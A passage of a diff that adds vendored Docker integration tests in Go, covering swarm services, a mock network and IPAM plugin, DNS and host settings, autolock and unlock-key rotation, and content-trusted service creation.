+ waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceRunningTasks(name), checker.Equals, 1) + + // Filter non-tasks + out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=false") + c.Assert(err, checker.IsNil) + psOut := strings.TrimSpace(out) + c.Assert(psOut, checker.Equals, bareID, check.Commentf("Expected id %s, got %s for is-task label, output %q", bareID, psOut, out)) + + // Filter tasks + out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=true") + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.Trim(out, "\n "), "\n") + c.Assert(lines, checker.HasLen, 1) + c.Assert(lines[0], checker.Not(checker.Equals), bareID, check.Commentf("Expected not %s, but got it for is-task label, output %q", bareID, out)) +} + +const globalNetworkPlugin = "global-network-plugin" +const globalIPAMPlugin = "global-ipam-plugin" + +func setupRemoteGlobalNetworkPlugin(c *check.C, mux *http.ServeMux, url, netDrv, ipamDrv string) { + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Implements": ["%s", "%s"]}`, driverapi.NetworkPluginEndpointType, ipamapi.PluginEndpointType) + }) + + // Network driver implementation + mux.HandleFunc(fmt.Sprintf("/%s.GetCapabilities", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Scope":"global"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.AllocateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + 
mux.HandleFunc(fmt.Sprintf("/%s.FreeNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Interface":{"MacAddress":"a0:b1:c2:d3:e4:f5"}}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Join", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + + veth := &netlink.Veth{ + LinkAttrs: netlink.LinkAttrs{Name: "randomIfName", TxQLen: 0}, PeerName: "cnt0"} + if err := netlink.LinkAdd(veth); err != nil { + fmt.Fprintf(w, `{"Error":"failed to add veth pair: `+err.Error()+`"}`) + } else { + fmt.Fprintf(w, `{"InterfaceName":{ "SrcName":"cnt0", "DstPrefix":"veth"}}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Leave", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + 
mux.HandleFunc(fmt.Sprintf("/%s.DeleteEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if link, err := netlink.LinkByName("cnt0"); err == nil { + netlink.LinkDel(link) + } + fmt.Fprintf(w, "null") + }) + + // IPAM Driver implementation + var ( + poolRequest remoteipam.RequestPoolRequest + poolReleaseReq remoteipam.ReleasePoolRequest + addressRequest remoteipam.RequestAddressRequest + addressReleaseReq remoteipam.ReleaseAddressRequest + lAS = "localAS" + gAS = "globalAS" + pool = "172.28.0.0/16" + poolID = lAS + "/" + pool + gw = "172.28.255.254/16" + ) + + mux.HandleFunc(fmt.Sprintf("/%s.GetDefaultAddressSpaces", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"LocalDefaultAddressSpace":"`+lAS+`", "GlobalDefaultAddressSpace": "`+gAS+`"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestPool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if poolRequest.AddressSpace != lAS && poolRequest.AddressSpace != gAS { + fmt.Fprintf(w, `{"Error":"Unknown address space in pool request: `+poolRequest.AddressSpace+`"}`) + } else if poolRequest.Pool != "" && poolRequest.Pool != pool { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit pool requests yet"}`) + } else { + fmt.Fprintf(w, `{"PoolID":"`+poolID+`", "Pool":"`+pool+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressRequest) + if err != nil { + http.Error(w, "Unable to 
decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now querying on the expected pool id + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressRequest.Address != "" { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit address requests yet"}`) + } else { + fmt.Fprintf(w, `{"Address":"`+gw+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleaseAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected address from the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressReleaseReq.Address != gw { + fmt.Fprintf(w, `{"Error":"unknown address"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleasePool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", netDrv) + err = ioutil.WriteFile(fileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) + 
+ ipamFileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", ipamDrv) + err = ioutil.WriteFile(ipamFileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) +} + +func (s *DockerSwarmSuite) TestSwarmNetworkPlugin(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + c.Assert(s.server, check.NotNil, check.Commentf("Failed to start an HTTP Server")) + setupRemoteGlobalNetworkPlugin(c, mux, s.server.URL, globalNetworkPlugin, globalIPAMPlugin) + defer func() { + s.server.Close() + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) + }() + + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "-d", globalNetworkPlugin, "foo") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "not supported in swarm mode") +} + +// Test case for #24712 +func (s *DockerSwarmSuite) TestSwarmServiceEnvFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + path := filepath.Join(d.folder, "env.txt") + err := ioutil.WriteFile(path, []byte("VAR1=A\nVAR2=A\n"), 0644) + c.Assert(err, checker.IsNil) + + name := "worker" + out, err := d.Cmd("service", "create", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // The complete env is [VAR1=A VAR2=A VAR1=B VAR1=C VAR2= VAR2] and duplicates will be removed => [VAR1=C VAR2] + out, err = d.Cmd("inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.Env }}", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "[VAR1=C VAR2]") +} + +func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "top" + + ttyCheck := "if [ -t 0 ]; then echo TTY > /status && top; else echo none > /status && top; fi" + + // Without --tty + expectedOutput := "none" + out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", 
"-c", ttyCheck) + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + out, err = d.Cmd("exec", id, "cat", "/status") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + // Remove service + out, err = d.Cmd("service", "rm", name) + c.Assert(err, checker.IsNil) + // Make sure container has been destroyed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + + // With --tty + expectedOutput = "TTY" + out, err = d.Cmd("service", "create", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck) + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id = strings.TrimSpace(out) + + out, err = d.Cmd("exec", id, "cat", "/status") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "false") + + _, err = d.Cmd("service", "update", "--tty", name) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") +} + +func (s *DockerSwarmSuite) TestDNSConfig(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + // Compare against expected output. 
+ expectedOutput1 := "nameserver 1.2.3.4" + expectedOutput2 := "search example.com" + expectedOutput3 := "options timeout:3" + out, err = d.Cmd("exec", id, "cat", "/etc/resolv.conf") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out)) + c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out)) + c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out)) +} + +func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + _, err = d.Cmd("service", "update", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name) + c.Assert(err, checker.IsNil) + + out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.DNSConfig }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "{[1.2.3.4] [example.com] [timeout:3]}") +} + +func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { + d := s.AddDaemon(c, false, false) + + outs, err := d.Cmd("swarm", "init", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + info, err := d.info() + c.Assert(err, 
checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + c.Assert(d.Restart(), checker.IsNil) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + + cmd := d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString("wrong-secret-key") + out, err := cmd.CombinedOutput() + c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) + c.Assert(string(out), checker.Contains, "invalid key") + + cmd = d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + out, err = cmd.CombinedOutput() + c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") + + outs, err = d.Cmd("swarm", "update", "--autolock=false") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + // Wait for autolock to be turned off + time.Sleep(time.Second) + + c.Assert(d.Restart(), checker.IsNil) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") +} + +func (s *DockerSwarmSuite) TestSwarmLeaveLocked(c *check.C) { + d := s.AddDaemon(c, false, false) + + outs, err := d.Cmd("swarm", "init", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(d.Restart("--swarm-default-advertise-addr=lo"), checker.IsNil) + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + + outs, _ = d.Cmd("node", 
"ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + outs, err = d.Cmd("swarm", "leave", "--force") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + outs, err = d.Cmd("swarm", "init") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) +} + +func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { + d := s.AddDaemon(c, true, true) + + outs, err := d.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + // Rotate multiple times + for i := 0; i != 3; i++ { + outs, err = d.Cmd("swarm", "unlock-key", "-q", "--rotate") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + // Strip \n + newUnlockKey := outs[:len(outs)-1] + c.Assert(newUnlockKey, checker.Not(checker.Equals), "") + c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey) + + c.Assert(d.Restart(), checker.IsNil) + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + cmd := d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + out, err := cmd.CombinedOutput() + + if err == nil { + // On occasion, the 
daemon may not have finished + // rotating the KEK before restarting. The test is + // intentionally written to explore this behavior. + // When this happens, unlocking with the old key will + // succeed. If we wait for the rotation to happen and + // restart again, the new key should be required this + // time. + + time.Sleep(3 * time.Second) + + c.Assert(d.Restart(), checker.IsNil) + + cmd = d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + out, err = cmd.CombinedOutput() + } + c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) + c.Assert(string(out), checker.Contains, "invalid key") + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + cmd = d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(newUnlockKey) + out, err = cmd.CombinedOutput() + c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") + + unlockKey = newUnlockKey + } +} + +func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + // Compare against expected output. 
+ expectedOutput := "1.2.3.4\texample.com" + out, err = d.Cmd("exec", id, "cat", "/etc/hosts") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + // Manager Addresses will always show Node 1's address + expectedOutput := fmt.Sprintf("Manager Addresses:\n 127.0.0.1:%d\n", d1.port) + + out, err := d1.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, err = d2.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, err = d3.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) +} + +func (s *DockerSwarmSuite) TestSwarmServiceInspectPretty(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "top" + out, err := d.Cmd("service", "create", "--name", name, "--limit-cpu=0.5", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + expectedOutput := ` +Resources: + Limits: + CPU: 0.5` + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") + + out, err = d.Cmd("service", "create", "--network=foo", "--name", 
"top", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") +} + +// TODO: migrate to a unit test +// This test could be migrated to unit test and save costly integration test, +// once PR #29143 is merged. +func (s *DockerSwarmSuite) TestSwarmUpdateWithoutArgs(c *check.C) { + d := s.AddDaemon(c, true, true) + + expectedOutput := ` +Usage: docker swarm update [OPTIONS] + +Update the swarm + +Options:` + + out, err := d.Cmd("swarm", "update") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) +} + +func (s *DockerTrustedSwarmSuite) TestTrustedServiceCreate(c *check.C) { + d := s.swarmSuite.AddDaemon(c, true, true) + + // Attempt creating a service from an image that is known to notary. + repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") + + name := "trusted" + serviceCmd := d.command("-D", "service", "create", "--name", name, repoName, "top") + s.trustSuite.trustedCmd(serviceCmd) + out, _, err := runCommandWithOutput(serviceCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) + + // Try trusted service create on an untrusted tag. 
+ + repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + name = "untrusted" + serviceCmd = d.command("service", "create", "--name", name, repoName, "top") + s.trustSuite.trustedCmd(serviceCmd) + out, _, err = runCommandWithOutput(serviceCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.NotNil, check.Commentf(out)) +} + +func (s *DockerTrustedSwarmSuite) TestTrustedServiceUpdate(c *check.C) { + d := s.swarmSuite.AddDaemon(c, true, true) + + // Attempt creating a service from an image that is known to notary. + repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") + + name := "myservice" + + // Create a service without content trust + _, err := d.Cmd("service", "create", "--name", name, repoName, "top") + c.Assert(err, checker.IsNil) + + out, err := d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Daemon won't insert the digest because this is disabled by + // DOCKER_SERVICE_PREFER_OFFLINE_IMAGE. + c.Assert(out, check.Not(checker.Contains), repoName+"@", check.Commentf(out)) + + serviceCmd := d.command("-D", "service", "update", "--image", repoName, name) + s.trustSuite.trustedCmd(serviceCmd) + out, _, err = runCommandWithOutput(serviceCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) + + // Try trusted service update on an untrusted tag. 
+ + repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + serviceCmd = d.command("service", "update", "--image", repoName, name) + s.trustSuite.trustedCmd(serviceCmd) + out, _, err = runCommandWithOutput(serviceCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) +} + +// Test case for issue #27866, which did not allow NW name that is the prefix of a swarm NW ID. +// e.g. if the ingress ID starts with "n1", it was impossible to create a NW named "n1". +func (s *DockerSwarmSuite) TestSwarmNetworkCreateIssue27866(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("network", "inspect", "-f", "{{.Id}}", "ingress") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + ingressID := strings.TrimSpace(out) + c.Assert(ingressID, checker.Not(checker.Equals), "") + + // create a network of which name is the prefix of the ID of an overlay network + // (ingressID in this case) + newNetName := ingressID[0:2] + out, err = d.Cmd("network", "create", "--driver", "overlay", newNetName) + // In #27866, it was failing because of "network with name %s already exists" + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + out, err = d.Cmd("network", "rm", newNetName) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) +} + +// Test case for https://github.com/docker/docker/pull/27938#issuecomment-265768303 +// This test creates two networks with the same name sequentially, with various drivers. +// Since the operations in this test are done sequentially, the 2nd call should fail with +// "network with name FOO already exists". 
+// Note that it is to ok have multiple networks with the same name if the operations are done +// in parallel. (#18864) +func (s *DockerSwarmSuite) TestSwarmNetworkCreateDup(c *check.C) { + d := s.AddDaemon(c, true, true) + drivers := []string{"bridge", "overlay"} + for i, driver1 := range drivers { + nwName := fmt.Sprintf("network-test-%d", i) + for _, driver2 := range drivers { + c.Logf("Creating a network named %q with %q, then %q", + nwName, driver1, driver2) + out, err := d.Cmd("network", "create", "--driver", driver1, nwName) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + out, err = d.Cmd("network", "create", "--driver", driver2, nwName) + c.Assert(out, checker.Contains, + fmt.Sprintf("network with name %s already exists", nwName)) + c.Assert(err, checker.NotNil) + c.Logf("As expected, the attempt to network %q with %q failed: %s", + nwName, driver2, out) + out, err = d.Cmd("network", "rm", nwName) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go new file mode 100644 index 0000000000..d9e56ce6df --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go @@ -0,0 +1,52 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Make sure task stays pending before plugin is available + waitAndAssert(c, defaultReconciliationTimeout, 
